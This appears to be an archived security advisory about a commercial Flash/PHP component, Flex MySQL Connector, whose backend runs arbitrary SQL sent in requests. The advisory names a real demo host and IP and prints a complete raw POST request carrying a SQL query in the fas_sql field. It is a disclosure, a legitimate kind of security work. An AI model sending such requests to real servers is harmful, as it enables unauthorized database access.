Flex MySQL Connector suffers from a remote SQL injection vulnerability.
c0bb97b1a43f90c2381075947dbc7e70$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$ Flex MySQL Connector Remote SQL Execution Exploit $$$
$$$ $$$
$$$ || License: Commercial $$$
$$$ || Language: English $$$
$$$ Flex MySQL Connector || Cost: $45.00 $$$
$$$ || Platform: Flash Player 9 | Flash Player 10 $$$
$$$ || Demo: http://flexappsstore.com/flexapps/demo/mysql/ $$$
$$$ $$$
$$$ || Name: ~Fyodor (aka DungPQ) $$$
$$$ Credit || Email: quangdung181188[at]gmail.com $$$
$$$ || Location: Hanoi, Vietnam $$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
[$] Vulnz Description :
Flex MySQL Connector is a Flex Component from FlexAppsStore, which allow run SQL from ActionScript via PHP backend (Flash <=> PHP <=> MySQL). But anybody can modify the SQL command in Request packet and send to PHP backend, it means anybody can query SQL commands to victim's MySQL server => OMG !
[$] Exploitz :
Send Example SQL command to MySQL at http://flexappsstore.com/flexapps/demo/mysql/
-----------------------------------------------------------------------------------
> Dest.IP = 66.147.242.177
> Dest.PORT = 80
---[Request BOF]---
POST /flexapps/flexmysqlconn.php?irand=0.2112374654971063 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.10
Host: www.flexappsstore.com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://flexappsstore.com/flexapps/demo/mysql/index.swf
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
Content-Length: 89
Content-type: application/x-www-form-urlencoded
fas%5Fdb=flexapps%5Fdemxo&fas%5Fsql=SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig
---[Request EOF]---
(Oh yeah, SQL command is SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig => SELECT count(*) as cnt1 FROM tbl_bigbig)
[$] PS: I don't give full PoC sourcecode. You can make your PoC by PHP (using fsockopen(), cUrl, ...) but if you want, contact me. ^_^
[$] ~Fyodor - The Still Lake
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!